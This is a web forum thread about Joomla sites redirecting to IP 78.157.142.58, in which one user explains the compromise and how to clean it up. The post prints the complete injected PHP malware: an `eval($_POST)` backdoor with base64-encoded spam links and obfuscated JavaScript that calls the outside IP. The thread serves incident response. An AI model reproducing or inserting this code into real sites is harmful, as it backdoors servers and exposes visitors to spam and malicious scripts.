0
Welcome Guest! Login
0 items Join Now

Weird redirect to IP 78.157.142.58

Last Post
Search Topic
    • Yves's Avatar
    • Yves
    • Preeminent Rocketeer
    • Posts: 9214
    • Thanks: 5

    Re: Weird redirect to IP 78.157.142.58

    Posted 16 years 3 days ago
    #244275

  • Re: Weird redirect to IP 78.157.142.58

    Posted 16 years 3 days ago
    • I think so, I reinstalled the latest version of the template this morning.
    #244282

  • Re: Weird redirect to IP 78.157.142.58

    Posted 15 years 11 months ago
    • Okay, after couple of day trying to figure it out which files are attacked I was able to locate the problem. The site's that very injected with this script are all Joomla! site's. There are two different ways how the script was injected. On is for Joomla! 1.0 and the other for 1.5.

      Joomla! 1.0:

      A line of code is added to your DB and in my case it was in "jos_mambots" table. the code looks something like this:

      ../../../../../../../hsphere/local/home/youraccount/yourdomain.com/ - and then the path that calls for a file that was added on your web server.

      In some cases this code in your DB also calls for a script on a different server. I have even visited the sites who's domain I found in the database, and they look like sites that were also attached.

      Files on your server can be any where. It can be and image file, third party extension, or Joomla! core file.

      By removing this from your DB and deleting the file from your server (if it is located there) will fix the problem.

      Joomla 1.5

      This one is more complicated and I will recommend for you to ask the your host to restore your files from earlier date. I have downloaded the files locali and in BBEdit did a search for the following code:

      <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST))eval($_POST);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJz
      b2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBmb3J1bXMgPGE
      gaHJlZj1odHRwOi8vd3d3LnlvdXR1YmUuY29tL3RyYXh0ZW5iZXJnNTU1IFRBUkdFVD1fYmxhbms+Y2hlYXAgZ2Vu
      ZXJpYyB2aWFncmE8L0E+LiA8QlIgLz4KQnV5IHZpYWdyYSBjaGVhcCBldmVyeW9uZSBrbm93cyB0aGF0IHByZXNj
      cmlwdGlvbiB2aWFncmEgPGEgaHJlZj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IF
      RBUkdFVD1fYmxhbms+QnV5IHZpYWdyYSBmb3IgbG93ZXN0IHByaWNlczwvQT4uIDxCUiAvPgpWaWFncmEgd2l
      sbCBub3QgbWFrZSB5b3VyIHBlbmlzIGdyb3cgYW55IGxhcmdlciBwZXJoYXBzIHlvdSBhbHJlYWR5IGhlYXIgYWJvdX
      QgZXJlY3RpbGUgZHlzZnVuY3Rpb24gZG9jdG9yIGluIGZhY3QsIG1lZGljYWwgYW5kIDxhIGhyZWY9aHR0cDovL2Z
      vcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4Mj52aWFncmEgYmVzdCBidXk8L0E+IDxCUiAvPgoKPHNjcmlwd
      D5pZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCclNzYkJTYxPyU3MiAhJTYxYC
      UyQ2AlNjk/LCU1RiUzQiU2MT0kJTVCJTIyQCUzMT85JTMxLiQlMzF+MyQlMzMlMjJgJTJDJCUyMmAlMzFgJTM1JTM
      3YCUyRT8lMzIhJTMwPzIlMjIlMkMiMTUhOC5gOCUzOSMiLCUyMmAxOTEjJTJFJTM4NHwlMjJAJTVEISUzQj9fQCUz
      RCUzMSUzQn5pI2YoIyU2NCU2RmMjJTc1fG1lJTZFISU3NCUyRWMkJTZGJCU2RnxrfiU2OWVALiU2RCU2MSElNzRj
      aCUyOCMlMkZ+JTVDYiU2OGAlNjdgZiU3ND8lM0RAMSQlMkY/JTI5PyUzRCUzRGBuISU3NWwlNkMlMjlmb3IlMjglN
      jklM0R+MCUzQnxpYDx8NDshJTY5fiUyQiUyQiklNjQhJTZGY351QG1gJTY1fG5AdGAudyU3MkBpIXQlNjUlMjhAIj88
      cyU2MyQlNzIlNjkhJTcwJTc0fD4kJTY5JTY2JTI4QF8lMjkkJTY0PyU2RiQlNjMlNzUlNkQlNjV8bnQudyU3MiU2OX4lNz
      Q/JTY1figlNUMkJTIyJTNDJTczJTYzJTcyISU2OSMlNzAhdCUyMCU2OSQlNjR8PUBfIiUyQmkjKyUyMiQlNUYlMjAlNz
      MlNzJAJTYzJTNEJTJGLyUzNzYuJTMxNjMuYCIkJTJCfmF+W2AlNjklNUQhKyIlMkYkJTYzJTcwJTJGJTNFJTNDYCU1
      Qz8lNUN8L2AlNzNjJTcyI2klNzB0JTNFIyU1Q2AiJTI5QCUzQz8lNUMvc34lNjNAciU2OXAjJTc0IyUzRSUyMiUyOX47
      JykucmVwbGFjZSgvYHxAfFwkfH58XD98I3xcfHxcIS9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3Njcmlwd
      D48L2Rpdj4K'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXY
      gc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+Ci
      Nz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\
      1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJ
      OKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS)call_user_func($GLOBALS,$a,$b,$c,$d);foreach(@ob_get_s
      tatus(1) as $v)if(($a=$v)=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS=$a;tmp_lkojfghx2(); ?>

      It is injected at the end of the file and it calls for a Javascript located at this IP address (78.157.142.58)

      I just searched for <?php if(!function_exists('tmp_l and was able to locate the files and to remove the code. After that everything worked great.

      But this code spreads really fast. In few days one of my account had almost 500 files with this code - Crazy. In this case my host helped. They wrote a FIND and REPLACE script on the server and were able to remove all of the code.

      I am not sure how they manage to do all this but this is very serious and you need to act right away. Make sure to check for permissions on your site. Added files have 444 permission.
    • Last Edit: 15 years 11 months ago by Dusan Vukasinovic.
    #247344
    • Ben Lee's Avatar
    • Ben Lee
    • Elite Rocketeer
    • Posts: 4193
    • Thanks: 42

    Re: Weird redirect to IP 78.157.142.58

    Posted 15 years 11 months ago
    • Thanks for posting your research!

      Always good to know what threats are out there and how to handle things if you get hit!
    #247424

Time to create page: 0.054 seconds